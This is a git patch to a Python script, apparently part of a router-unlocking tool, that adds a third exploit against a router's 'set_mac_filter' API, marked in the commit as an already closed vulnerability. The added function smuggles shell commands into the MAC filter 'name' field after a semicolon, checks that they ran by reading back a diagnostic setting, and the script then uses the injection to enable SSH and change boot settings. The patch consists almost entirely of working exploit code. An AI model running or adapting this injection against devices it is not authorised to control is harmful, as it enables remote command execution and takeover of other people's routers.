From 168878255b1282861569a7bfa765905df5cff5a4 Mon Sep 17 00:00:00 2001
From: remittor <remittor@gmail.com>
Date: Sun, 20 Apr 2025 20:05:48 +0300
Subject: [PATCH] connect6: Add new exploit "set_mac_filter" (vuln already
 closed)

---
 connect6.py | 28 ++++++++++++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)

diff --git a/connect6.py b/connect6.py
index 10c15c8..5bc37c7 100644
--- a/connect6.py
+++ b/connect6.py
@@ -38,13 +38,34 @@ def exploit_2(cmd, api = 'API/xqsystem/start_binding'):
         res = ''
     return res
 
+def exploit_3(cmd, api = 'API/xqsystem/set_mac_filter'):
+    # vuln/exploit author: ?????????
+    if '\n' in cmd:
+        raise ValueError('Incorrect shell command format')
+    options = { 'add': 0, 'del': 1 }
+    for action, option in options.items():
+        time.sleep(0.05)
+        time_ms = time.time_ns() // 1_000_000
+        name = f'xxx ; uci set diag.config.usb_read_thr={time_ms} ; uci commit diag ; ' + cmd
+        params = { 'mac': '00:00:00:00:00:33', 'name': name, 'option': option, 'wan': '' }
+        try:
+            res = gw.api_request(api, params, resp = 'text', timeout = 2)
+        except requests.exceptions.ReadTimeout:
+            res = ''
+        if not res or '"code":0' not in res:
+            return ''
+        diag = gw.get_diag_paras(timeout = 2)
+        if str(diag['usb_read_thr']) == str(time_ms):
+            return res  # Ok
+    return ''
+
 
 # set default value for iperf_test_thr
 gw.set_diag_iperf_test_thr(20)
 
 vuln_test_num = 82000011
 exec_cmd = None
-exp_list = [ exploit_2, exploit_1 ]
+exp_list = [ exploit_2, exploit_1, exploit_3 ]
 for idx, exp_func in enumerate(exp_list):
     exp_test_num = vuln_test_num + idx
     res = exp_func(f"uci set diag.config.iperf_test_thr={exp_test_num} ; uci commit diag")
@@ -60,7 +81,7 @@ for idx, exp_func in enumerate(exp_list):
 gw.set_diag_iperf_test_thr(20)
 
 if not exec_cmd:
-    raise ExploitNotWorked('Exploits "arn_switch/start_binding" not working!!!')
+    raise ExploitNotWorked('Exploits "arn_switch/start_binding/set_mac_filter" not working!!!')
 
 if exec_cmd == exploit_1:
     print('Exploit "arn_switch" detected!') 
@@ -68,6 +89,9 @@ if exec_cmd == exploit_1:
 if exec_cmd == exploit_2:
     print('Exploit "start_binding" detected!') 
 
+if exec_cmd == exploit_3:
+    print('Exploit "set_mac_filter" detected!') 
+
 
 exec_cmd(r"sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
 exec_cmd(r"nvram set ssh_en=1 ; nvram set boot_wait=on ; nvram set bootdelay=3 ; nvram commit")